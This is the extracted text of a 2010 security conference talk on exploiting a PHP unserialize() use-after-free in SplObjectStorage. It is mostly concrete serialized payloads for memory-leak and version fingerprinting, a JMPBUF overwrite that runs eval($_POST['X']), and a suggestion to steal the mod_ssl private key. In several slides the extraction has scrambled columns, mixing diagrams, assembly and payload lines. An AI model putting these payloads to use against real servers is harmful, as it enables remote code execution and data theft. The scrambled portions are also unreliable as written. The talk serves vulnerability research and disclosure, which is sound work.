5;C:16:"SplObjectStorage":14:{x:i:0;m:a:0:{}}
2
3
array
4
0 0
5
stdClass 1 2.0
6
2 “ABCD“
a stdClass 7
3 2.0
4 stdClass
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 27
28. unserialize()
a:6:{i:0;i:0;i:1;d:2;i:2;s:4:"ABCD";i:3;r:3;i: var_table
4;O:8:"stdClass":2:{s:1:"a";r:6;s:1:"b";N;};i:
1
5;C:16:"SplObjectStorage":14:{x:i:0;m:a:0:{}}
2
3
array
4
0 0
5
stdClass 1 2.0
6
2 “ABCD“
a stdClass 7
3 2.0
b NULL 8
4 stdClass
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 28
29. unserialize()
a:6:{i:0;i:0;i:1;d:2;i:2;s:4:"ABCD";i:3;r:3;i: var_table
4;O:8:"stdClass":2:{s:1:"a";r:6;s:1:"b";N;};i:
1
5;C:16:"SplObjectStorage":14:{x:i:0;m:a:0:{}}
2
3
array
4
0 0
5
stdClass 1 2.0
6
2 “ABCD“
a stdClass 7
3 2.0
b NULL 8
4 stdClass
9
5 splObjectStorage
splObjectStorage
... ...
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 29
31. SplObjectStorage
• provides an object set in PHP 5.2
<?php
$x = new SplObjectStorage();
C:16:"SplObjectStorage":47:{x:i:2;O:5:"Alpha":0:
$x->attach(new Alpha());
{};O:4:"Beta":0:{};m:a:0:{}}
$x->attach(new Beta());
?>
• provides a map from objects to data in PHP 5.3
<?php
$x = new SplObjectStorage();
C:16:"SplObjectStorage":61:{x:i:2;O:5:"Alpha":0:{},
$x->attach(new Alpha(), 123);
i:123;;O:4:"Beta":0:{},i:456;;m:a:0:{}}
$x->attach(new Beta(), 456);
?>
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 31
32. Object Set/Map Index
• key to the object set / map is derived from the object value
zend_object_value zvalue;
memset(&zvalue, 0, sizeof(zend_object_value));
zvalue.handle = Z_OBJ_HANDLE_P(obj);
zvalue.handlers = Z_OBJ_HT_P(obj);
zend_hash_update(&intern->storage, (char*)&zvalue, sizeof(zend_object_value), &element,
sizeof(spl_SplObjectStorageElement), NULL);
typedef struct _zend_object_value {
zend_object_handle handle;
zend_object_handlers *handlers;
} zend_object_value;
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 32
33. Vulnerability in PHP 5.3.x
• references allow to attach the same object again
• in PHP 5.3.x this will destruct the previously stored extra data
• destruction of the extra data will not touch the internal var_table
• references allow to still access/use the freed PHP variables
• use-after-free vulnerability allows to info leak or execute code
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 33
34. Vulnerability in PHP 5.2.x (I)
• in PHP 5.2.x there is no extra data
• attaching the same object will just decrease the reference counter
• unserializer is not protected against type confusion attacks
• on x86 systems a double can collide with an object
object object
handle handlers
⎫
⎬
⎭
⎫
⎬
⎭
object ZVAL: 18 00 00 00 80 40 B5 01 01 00 00 00 05 00
double ZVAL: 18 00 00 00 80 40 B5 01 01 00 00 00 02 00
⎭
⎪
⎪
⎬
⎪
⎪
⎫
double value
with same binary
representation
1.983367467369837e-300
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 34
35. Vulnerability in PHP 5.2.x (II)
• double with same binary representation will destruct the object
• destruction of object will not touch the internal var_table
• references allow to still access/use the freed object/properties
• use-after-free vulnerability allows to info leak or execute code
• exploit works against 32 bit PHP 5.3.x, too
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 35
36. Vulnerable Applications
• discussed vulnerability allows arbitrary code execution in any PHP
application unserializing user input
• but in order to exploit it nicely the PHP applications should
re-serialize and echo the result
• both is quite common in widespread PHP applications e.g. TikiWiki 4.2
if (!isset($_REQUEST['printpages']) && !isset($_REQUEST['printstructures'])) {
...
} else {
$printpages = unserialize(urldecode($_REQUEST["printpages"]));
$printstructures = unserialize(urldecode($_REQUEST['printstructures']));
}
...
$form_printpages = urlencode(serialize($printpages));
$smarty->assign_by_ref('form_printpages', $form_printpages);
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 36
37. Part V
Bruteforcing the Object Handlers Address
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 37
38. Object Handler Address Bruteforcing (I)
• in order to exploit PHP 5.2.x a double collision is required
• a double collision occurs when object handle and object handlers
matches the binary representation of a double
• object handle is a small number
• object handlers is a pointer into the data segment
typedef struct _zend_object_value {
zend_object_handle handle;
zend_object_handlers *handlers;
} zend_object_value;
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 38
39. Object Handler Address Bruteforcing (II)
• object handle
• small number depending on number of objects
• bruteforcing not required we can just serialize 50 stdClass objects
• assume 49 as handle
• object handlers
• low 12 bits of address are known for a known PHP binary
• shared library randomization usually worse than 17 bit
• we can bruteforce multiple addresses with one request
• bruteforcing doesn‘t crash the process
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 39
42. Part VI
Simple Information Leaks via unserialize()
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 42
43. DWORD Size?
• for the following steps it is required to know if target is 32 bit or 64 bit
• we can detect the bit size by sending integers larger than 32 bit
- sending:
➡ i:11111111111;
- answer:
➡ 64 bit PHP - i:11111111111;
➡ 32 bit PHP - i:-1773790777;
➡ 32 bit PHP - d:11111111111;
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 43
44. PHP 5.2.x vs. PHP 5.3.x
• as demonstrated the exploit is different for PHP 5.2.x and 5.3.x
• we can detect a difference in the ArrayObject implementation
- sending:
➡ O:11:"ArrayObject":0:{}
- answer:
➡ PHP 5.2.x - O:11:"ArrayObject":0:{}
➡ PHP 5.3.x - C:11:"ArrayObject":21:{x:i:0;a:0:{};m:a:0:{}}
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 44
45. SplObjectStorage Version
• bugfix in the latest versions of PHP 5.2.x and PHP 5.3.x
• stored objects counter is no longer put in var_table
• can be detected by references
- sending:
➡ C:16:"SplObjectStorage":38:{x:i:0;m:a:3:{i:1;i:1;i:2;i:2;i:3;r:4;}}
- answer:
➡ PHP <= 5.2.12 - PHP <= 5.3.1
C:16:"SplObjectStorage":38:{x:i:0;m:a:3:{i:1;i:1;i:2;i:2;i:3;i:2;}}
➡ PHP >= 5.2.13 - PHP >= 5.3.2
C:16:"SplObjectStorage":38:{x:i:0;m:a:3:{i:1;i:1;i:2;i:2;i:3;i:1;}}
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 45
47. Endianess?
• for portability we need to detect the endianess remotely
• no simple info leak available
• we need a leak-after-free attack for this
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 47
48. Creating a fake integer ZVAL
• we construct a string that represents an integer ZVAL
integer reference
value counter
⎫
⎬
⎭
⎫
⎬
⎭
32 bit integer ZVAL: 00 01 00 00 41 41 41 41 00 01 01 00 01 00
• string is a valid integer no matter what endianess
• reference counter is choosen to be not zero or one (0x101)
• type is set to integer variable (0x01)
• value will be 0x100 for little endian and 0x10000 for big endian
• when sent to the server the returned value determines endianess
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 48
49. Endianess Unserialize Payload
orange numbers are not
valid because serialized
strings were modified to
enhance visibilty
• create an array of integer variables
• free the array
• create a fake ZVAL string which will reuse the memory
• create a reference to one of the already freed integer variables
• reference will point to our fake ZVAL
a:1:{i:0;C:16:"SPLObjectStorage":159:{x:i:2;i:0;,a:10:{i:1;i:1;i:
2;i:2;i:3;i:3;i:4;i:4;i:5;i:5;i:6;i:6;i:7;i:7;i:8;i:8;i:9;i:9;i:
10;i:10;};i:0;,i:0;;m:a:2:{i:1;S:19:"00010000AAAA
0001010001x00BBCCC";i:2;r:11;}}}}
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 49
50. Endianess Payload Reply
• for little endian systems the reply will be
a:1:{i:0;C:16:"SplObjectStorage":65:{x:i:1;i:0;,i:0;;m:a:2:{i:1;S:
19:"00010000AAAA0001010001x00BBCCC";i:2;i:256;}}}
• and for big endian systems it is
a:1:{i:0;C:16:"SplObjectStorage":67:{x:i:1;i:0;,i:0;;m:a:2:{i:1;S:
19:"00010000AAAA0001010001x00BBCCC";i:2;i:65536;}}}
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 50
51. Leak Arbitrary Memory?
• we want a really stable, portable, non-crashing exploit
• this requires more info leaks - it would be nice to leak arbitrary memory
• is that possible with a leak-after-free attack? Yes it is!
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 51
52. Creating a fake string ZVAL
• we construct a string that represents a string ZVAL
string string reference
pointer length counter
⎫
⎬
⎭
⎫
⎬
⎭
⎫
⎬
⎭
32 bit string ZVAL: 18 21 34 B7 00 04 00 00 00 01 01 00 06 00
• our fake string ZVAL
• string pointer points where we want to leak (0xB7342118)
• length is set to 1024 (0x400)
• reference counter is choosen to be not zero or one (0x101)
• type is set to string variable (0x06)
• when sent to the server the returned value contains 1024 leaked bytes
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 52
53. Arbitrary Leak Unserialize Payload
• create an array of integer variables
• free the array
• create a fake ZVAL string which will reuse the memory
• create a reference to one of the already freed integer variables
• reference will point to our fake string ZVAL
a:1:{i:0;C:16:"SPLObjectStorage":159:{x:i:2;i:0;,a:10:{i:1;i:1;i:
2;i:2;i:3;i:3;i:4;i:4;i:5;i:5;i:6;i:6;i:7;i:7;i:8;i:8;i:9;i:9;i:
10;i:10;};i:0;,i:0;;m:a:2:{i:1;S:19:"182134B70004
00000001010006x00BBCCC";i:2;r:11;}}}}
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 53
54. Arbitrary Leak Response
• the response will look a lot like this
a:1:{i:0;C:16:"SplObjectStorage":1093:{x:i:1;i:0;,i:0;;m:a:2:{i:
1;S:19:"182134B700040000000101000600BBCCC";i:2;s:
1024:"??Y?`?R?0?R?P?R???Q???Q?@?Q???Q??Q???Q?P?Q?`?R?0?R?cR?p?R??
R??R???R?0?R?`|R?@?R???R?p?R??gR??R??hR??gR??jR?0hR???R??kR?`?R?0?
R?P?R???R??R?.......................
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]
^_`abcdefghijklmnopqrstuvwxyz{|}
~????????????????????????????????????????????????????@?N22PAPQY?
TY???d??9Y???]?s6??BY?`?J?PBY??AY?`8Y??=Y?`]P? @Y??>Y?0>Y??=Y?
<Y?;Y?`9Y??2??]?ve??TY??TY?UY???
Y???e???e??e?`?e??e?`?e???e???";}}}
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 54
55. Starting Point?
• wait a second...
• how do we know where to start when leaking memory
• can we leak some PHP addresses
• is that possible with a leak-after-free attack? Yes it is!
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 55
56. Creating a fake string ZVAL
• we again construct a string that represents a string ZVAL
string string reference
pointer length counter
⎫
⎬
⎭
⎫
⎬
⎭
⎫
⎬
⎭
32 bit string ZVAL: 41 41 41 41 00 04 00 00 00 01 01 00 06 00
• our fake string ZVAL
• pointer points where anywhere - will be overwritten by a free (0x41414141)
• length is set to 1024 (0x400)
• reference counter is choosen to be not zero or one (0x101)
• type is set to string variable (0x06)
• when sent to the server the returned value contains 1024 leaked bytes
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 56
57. Starting Point Leak Unserialize Payload
a:1:{i:0;C:16:"SPLObjectStorage":1420:{x:i:6;i:1;,a:40:{i:0;i:0;i:1;i:
1;i:2;i:2;i:3;i:3;i:4;i:4;i:5;i:5;i:6;i:6;i:7;i:7;i:8;i:8;i:9;i:9;i:10;i:
10;i:11;i:11;i:12;i:12;i:13;i:13;i:14;i:14;i:15;i:15;i:16;i:16;i:17;i:
• create an array of integer 17;i:18;i:18;i:19;i:19;i:20;i:20;i:21;i:21;i:22;i:22;i:23;i:23;i:24;i:
variables to allocate memory 24;i:25;i:25;i:26;i:26;i:27;i:27;i:28;i:28;i:29;i:29;i:30;i:30;i:31;i:
31;i:32;i:32;i:33;i:33;i:34;i:34;i:35;i:35;i:36;i:36;i:37;i:37;i:38;i:
38;i:39;i:39;};i:0;,a:40:{i:0;i:0;i:1;i:1;i:2;i:2;i:3;i:3;i:4;i:4;i:5;i:
• create another array of integer 5;i:6;i:6;i:7;i:7;i:8;i:8;i:9;i:9;i:10;i:10;i:11;i:11;i:12;i:12;i:13;i:
variables and free the array 13;i:14;i:14;i:15;i:15;i:16;i:16;i:17;i:17;i:18;i:18;i:19;i:19;i:20;i:
20;i:21;i:21;i:22;i:22;i:23;i:23;i:24;i:24;i:25;i:25;i:26;i:26;i:27;i:
27;i:28;i:28;i:29;i:29;i:30;i:30;i:31;i:31;i:32;i:32;i:33;i:33;i:34;i:
• create an array which mixes our 34;i:35;i:35;i:36;i:36;i:37;i:37;i:38;i:38;i:39;i:39;};i:0;,i:0;;i:0;,a:
fake ZVAL strings and objects 20:{i:100;O:8:"stdclass":0:{}i:0;S:
19:"41414141000400000001010006x00BBCCC";i:101;O:
8:"stdclass":0:{}i:1;S:
• free that array 19:"41414141000400000001010006x00BBCCC";i:102;O:
8:"stdclass":0:{}i:2;S:19:"414141410004
• create a reference to one of the 00000001010006x00BBCCC";i:103;O:8:"stdclass":0:{}i:3;S:
19:"414141410004
already freed integer variables 00000001010006x00BBCCC";i:104;O:8:"stdclass":0:{}i:4;S:
19:"414141410004
• reference will point to our already 00000001010006x00BBCCC";i:105;O:8:"stdclass":0:{}i:5;S:
19:"414141410004
freed fake string ZVAL 00000001010006x00BBCCC";i:106;O:8:"stdclass":0:{}i:6;S:
19:"414141410004
00000001010006x00BBCCC";i:107;O:8:"stdclass":0:{}i:7;S:
• string pointer of fake string 19:"414141410004
was overwritten by memory 00000001010006x00BBCCC";i:108;O:8:"stdclass":0:{}i:8;S:
cache !!! 19:"414141410004
00000001010006x00BBCCC";i:109;O:8:"stdclass":0:{}i:9; S:
19:"414141410004
00000001010006x00BBCCC";};i:0;,i:0;;i:1;,i:0;;m:a:2:{i:0;i:0;i:
1;r:57;}}}}
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 57
58. Starting Point Leak Response
• the response will contain the leaked 1024 bytes of memory
• starting from an already freed address
• we search for freed object ZVALs in the reply
overwritten object reference
by free handlers counter
⎫
⎬
⎭
⎫
⎬
⎭
⎫
⎬
⎭
32 bit object ZVAL: 41 41 41 41 20 12 34 B7 00 00 00 00 05 00
⎭
⎪
⎬
⎪
⎫
pattern
to search
• the object handlers address is a pointer into PHP‘s data segment
• we can leak memory at this address to get a list of pointers into the code segment
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 58
59. Where to go from here?
• having pointers into the code segment
and an arbitrary mem info leak we can ...
• scan backward for the ELF / PE / ... executable header
• remotely steal the PHP binary and all it‘s data
• lookup any symbol in PHP binary
• find other interesting webserver modules (and their executable headers)
• and steal their data (e.g. mod_ssl private SSL key)
• use gathered data for a remote code execution exploit
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 59
61. Taking Control (I)
• to take over control we need to
• corrupt memory layout
• call user supplied function pointers
• unserialize() allows to destruct and create fake variables
• string - freeing arbitrary memory addresses
• array - calling hashtable destructor
• object - calling del_ref() from object handlers
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 61
62. Taking Control (II)
• object and array variables point to tables with function pointers only
• string variables store pointer to free inline
• small freed memory blocks end up in PHP‘s memory cache
• new string variable of same size will reuse cached memory
• allows to overwrite with attacker supplied data
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 62
63. PHP and the Linux x86 glibc JMPBUF
• PHP uses a JMPBUF for try {} catch {} at C level
jmpbuf
• JMPBUF is stored on stack
EBX
• executor_globals point to current JMPBUF
ESI
EDI
• glibc uses pointer obfuscation for ESP and EIP
EBP
• ROL 9
ESP ecx
),%
(% esp ,%e
dx
• XOR gs:[0x18] 0x4 e cx) i
mov 4(% %ed
0x1 ec x),
EIP mov 0(%
0x1 dx
,%e edx
mov 0x9 8,%
• obvious weakness ror
$
%gs
: 0x1
,%e
di
edi
xo r $ 0x9 8,%
: 0x1
ror %gs sp
,%e
• EBP not obfuscated x or % edi 1
f29
cmp 0 x8c p
%es
j be $0 xc,
sub
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 63
64. Breaking PHP‘s JMPBUF
• lowest 2 bits of ESP are always 0
jmpbuf
• allows determining lowest 2 bits of EIP
EBX
ESI
• PHP‘s JMPBUF points into php_execute_script()
EDI • prepended by CALL E8 xx xx xx xx
EBP
• followed by XOR + TEST 31 xx 85 xx
ESP
EIP
• we can search for EIP
• known EIP allows determining secret XORER
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 64
65. Using Fake Strings to Overwrite JMPBUF (I)
• search process stack from JMPBUF‘s position backward
• there are atleast MAX_PATH bytes
• search for pattern XX 00 00 00 (XX>0x0c and XX<0x8f)
• field could be the size field of a small memory block
3 34 21 10 00 00 00 D3 A2 51 30 20 87 54 C2 BF 77 43 67 23 12
JMPBUF - 0x43
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 65
66. Using Fake Strings to Overwrite JMPBUF (II)
memory cache
NULL
0x55667788
NULL
• we can create a fake string
NULL
• with string data at JMPBUF - 0x43 + 8
NULL
• and free it NULL
MEMORY HEADER STRING DATA
3 34 21 10 00 00 00 D3 A2 51 30 20 87 54 C2 BF 77 43 67 23 12
JMPBUF - 0x43 FAKE STRING
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 66
67. Using Fake Strings to Overwrite JMPBUF (III)
memory cache
NULL
FAKE STRING
• PHP‘s allocator will put a block of size NULL
0x10 into memory cache NULL
• first 4 bytes will be overwritten by NULL
pointer to next block NULL
MEMORY HEADER STRING DATA
3 34 21 10 00 00 00 D3 A2 51 30 88 77 66 55 BF 77 43 67 23 12
JMPBUF - 0x43 FAKE STRING
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 67
68. Using Fake Strings to Overwrite JMPBUF (IV)
memory cache
NULL
0x55667788
• creating a fake 7 byte string will reuse
the cached memory NULL
NULL
‣ “x78x00x00x00XXX“
NULL
• next block pointer will be restored
NULL
• string data gets copied into stack
MEMORY HEADER STRING DATA
3 34 21 10 00 00 00 D3 A2 51 30 78 00 00 00 58 58 58 00 23 12
JMPBUF - 0x43 FAKE STRING
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 68
69. Using Fake Strings to Overwrite JMPBUF (V)
memory cache
NULL
0x55667788
• we repeat the attack with our new string data
NULL
• this time we can write 0x70 bytes NULL
• enough to overwrite JMPBUF - 0x33 bytes away NULL
NULL
• and putting more payload on the stack
MEMORY HEADER STRING DATA ...
A2 51 30 78 00 00 00 58 58 58 00 23 12 17 55 23 A2 A1 FF FF FF
JMPBUF - 0x3B NEW FAKE STRING
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 69
70. Using Fake Strings to Overwrite JMPBUF (VI)
• We can now setup a stack frame for zend_eval_string()
• and injected PHP code
• and the JMPBUF
78 00 00 00 58 58 58 00 00 00 00 XX XX XX XX 00
00 00 00 XX XX XX XX 00 00 00 00 00 00 00 00 00
e v a l ( $ _ P O S T [ ‘ X ‘ ]
) ; 00 00 00 00 00 00 00 00 00 EBX EBX EBX EBX ESI
ESI ESI ESI EDI EDI EDI EDI EBP EBP EBP EBP ESP ESP ESP ESP EIP
EIP EIP EIP 00 D3 A2 51 30 78 00 00 00 58 58 58 00
10 00 00 00 D3 A2 51 30 78 00 00 00 58 58 58 00
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 70
71. Triggering JMPBUF Execution
• PHP will pass execution to the JMPBUF on zend_bailout()
• zend_bailout() is executed for core errors and on script termination
• unserialize() can trigger a FATAL ERROR
• unserializing too big arrays will alert the MM‘s integer overflow detection
‣ unserialize('a:2147483647:{');
• this will result in longjmp() jumping to zend_eval_string()
• which will execute our PHP code
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 71
72. Thank you for listening...
DEMO
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 72
73. Thank you for listening...
QUESTIONS ?
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 73